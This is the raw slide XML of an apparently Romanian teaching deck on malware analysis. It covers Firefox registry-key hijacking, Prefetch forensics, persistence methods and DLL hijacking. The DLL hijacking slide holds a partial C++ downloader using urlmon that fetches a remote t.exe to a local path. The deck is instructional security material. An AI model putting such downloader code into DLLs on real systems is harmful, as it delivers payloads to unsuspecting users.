                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t> oferind detalii despre calea dintre două noduri de rețea și statistici ping pentru fiecare nod.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pathping example.com </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Flowchart: Process 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="283463" y="898071"/>
            <a:ext cx="11712593" cy="584381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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41860052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2942" y="299131"/>
            <a:ext cx="10515600" cy="774246"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Execution spoofing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1970769"/>
            <a:ext cx="10515600" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Calea SOFTWARE\Clients\StartMenuInternet\FIREFOX.EXE\shell\open\command dintr-un registru Windows specifică locația executabilului Firefox pe sistemul respectiv. În contextul registrului Windows, această cale este folosită pentru a defini comanda care va fi executată atunci când un utilizator dorește să deschidă Firefox prin intermediul meniului de start sau atunci când un link sau o resursă de internet trebuie deschisă cu Firefox, dacă acesta este setat ca browser implicit.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Mai exact, când un program sau proces solicită deschiderea unei pagini web și sistemul este configurat să folosească Firefox ca browser web implicit, Windows va consulta această intrare în registru pentru a afla cum să lanseze Firefox. Comanda specificată la această cale de registru va include, de obicei, calea către executabilul Firefox (firefox.exe) și, opțional, parametri care indică cum să fie deschisă pagina sau resursa web solicitată.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Din perspectiva securității, este important să se verifice aceste intrări de registru pentru a se asigura că nu au fost modificate în mod malitios. Modificările neautorizate ar putea redirecționa solicitările către un browser sau executabil dăunător, facilitând atacuri de tip phishing sau malware. În contextul analizei sau remedierii malware, verificarea acestor intrări poate ajuta la identificarea comportamentului neașteptat sau a modificărilor sistemului făcute de software-ul dăunător.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Flowchart: Process 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="406835" y="1369787"/>
            <a:ext cx="11393279" cy="5103586"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41641870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6835" y="0"/>
            <a:ext cx="10838329" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Flowchart: Process 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="774192" y="2930651"/>
            <a:ext cx="3029712" cy="97688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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42341673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09431"/>
            <a:ext cx="12192000" cy="4439138"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34616632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1000" y="0"/>
            <a:ext cx="10530000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13246644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79322"/>
            <a:ext cx="12192000" cy="5899355"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25291968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442180"/>
            <a:ext cx="12192000" cy="1973640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Flowchart: Process 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D77B233-2B30-7B5D-8B9E-8ADF4BFB5B8A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="90684" y="1908629"/>
            <a:ext cx="12008113" cy="2738941"/>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
        <p:nvSpPr>
          <p:cNvPr id="4" name="Flowchart: Process 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{994607D3-9375-0A8C-A26E-10D786011774}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="200262" y="3075709"/>
            <a:ext cx="3313756" cy="755703"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{254901B7-F774-3FDB-2CF6-4123B00A1109}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5346921" y="5504275"/>
            <a:ext cx="1495637" cy="512394"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19997235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Principalele părți ale prezentării</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1126641" y="2651209"/>
            <a:ext cx="9956042" cy="2792519"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>C.13.1 Anihilarea programelor antimalware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>C.13.2 Persistenta malware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>C.13.3 DLL HijackinG</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2039546"/>
            <a:ext cx="4216219" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2800">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:prstClr>
                </a:solidFill>
              </a:rPr>
              <a:t>C.13 Metode de persistenta:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800">
              <a:solidFill>
                <a:prstClr val="black">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:prstClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1775379"/>
            <a:ext cx="11769811" cy="62386"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A5A5A5"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13571109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owchart: Process 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8EF2551-0332-FB89-E1B9-63B07A6720FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566777" y="563478"/>
            <a:ext cx="5788682" cy="3948066"/>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62907" y="103909"/>
            <a:ext cx="5038017" cy="6650182"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2FD7595-F26B-5834-3A7F-F3407FF06451}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1126624" y="1106350"/>
            <a:ext cx="4551849" cy="2862322"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Fișierele .pf din Prefetch (Prefetcher) sunt utilizate de sistemul de operare Windows pentru a accelera încărcarea aplicațiilor și pentru a îmbunătăți performanța generală a sistemului. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Aceste fișiere conțin informații despre executabilele pe care le lansează utilizatorul și includ detalii precum resursele pe care le accesează și ordinea în care sunt încărcate.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F918D134-111D-5636-871D-3D7F7D0C7A04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2671736" y="5389975"/>
            <a:ext cx="1495637" cy="512394"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23046371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Process 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1BADB66-4942-2744-5A11-57FD8109783B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1908629"/>
            <a:ext cx="11284857" cy="4833257"/>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
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Prefetch</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581192" y="2075300"/>
            <a:ext cx="10436058" cy="4499914"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Pentru detecția malware, extragerea și analiza acestor fișiere pot fi utile din mai multe motive:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>Istoricul activităților</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>. Fișierele Prefetch oferă o evidență a aplicațiilor executate pe sistem, inclusiv data și ora primei și ultimei execuții. Acest lucru poate ajuta la identificarea activităților suspecte sau neobișnuite.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>Ordinea de încărcare a modulelor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>. Deoarece fișierele .pf conțin informații despre resursele utilizate și ordinea de încărcare, ele pot dezvălui module sau biblioteci neobișnuite care sunt încărcate de un executabil, ceea ce ar putea sugera prezența unui malware.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>Prezența executabilelor necunoscute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>. Analiza fișierelor .pf poate dezvălui executabile necunoscute sau neautorizate care au fost lansate pe sistem, indicând o posibilă compromitere.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>Comportament anormal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>. Dacă un fișier .pf arată activitate frecventă în afara orelor obișnuite sau în timpul în care utilizatorul nu ar trebui să fie activ, acesta ar putea indica un comportament malițios.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>Corelare cu alte artefacte</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>. Fișierele .pf pot fi corelate cu alte artefacte digitale pentru a obține o imagine mai completă a comportamentului sistemului și a detecta potențiale anomalii.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Astfel, analiza fișierelor .pf din Prefetch poate fi un instrument valoros în detectarea și investigarea activităților malware, ajutând la identificarea tiparelor suspecte și a executabilelor neautorizate.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18358133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17525"/>
            <a:ext cx="12192000" cy="4022949"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Flowchart: Process 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DFA41480-4CC9-C66B-1D52-8413D854197F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="113506" y="3083266"/>
            <a:ext cx="1737966" cy="816159"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21773262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73145"/>
            <a:ext cx="12192000" cy="3311710"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Flowchart: Process 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A4762CE-6454-024F-12B5-7B10AB21A977}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="113506" y="2992583"/>
            <a:ext cx="5327552" cy="8841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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23314534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5458" y="0"/>
            <a:ext cx="11081084" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Flowchart: Process 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDEA64A0-C74D-53DC-FD5D-EBC1C54C1DA6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="634790" y="2773428"/>
            <a:ext cx="5010308" cy="131492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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32501348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5145"/>
            <a:ext cx="12192000" cy="6727710"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Flowchart: Process 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4850C341-A7ED-C7BC-38FB-4ECA7053881C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="143582" y="2856555"/>
            <a:ext cx="3483789" cy="1133553"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4683451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977038" y="1625165"/>
            <a:ext cx="9755187" cy="2766528"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" u="sng"/>
              <a:t>C.14.3</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>DLL Hijacking</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10756663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lowchart: Process 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="435864" y="1943099"/>
            <a:ext cx="11280648" cy="4776537"/>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
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>DLL hai jaking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="538520" y="2512824"/>
            <a:ext cx="6118353" cy="3714863"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="804000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>#include &lt;iostream&gt;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804000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>#include &lt;urlmon.h&gt;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804000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>#pragma comment(lib, "urlmon.lib")</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8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>int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main</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 URL-ul fișierului care va fi descărcat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a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>const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a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>char</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url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a:solidFill>
                  <a:srgbClr val="808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u="sng">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>https://github.com/Gagniuc/ATM/raw/main/t.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="808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 Calea locală unde va fi salvat fișierul descărcat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a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
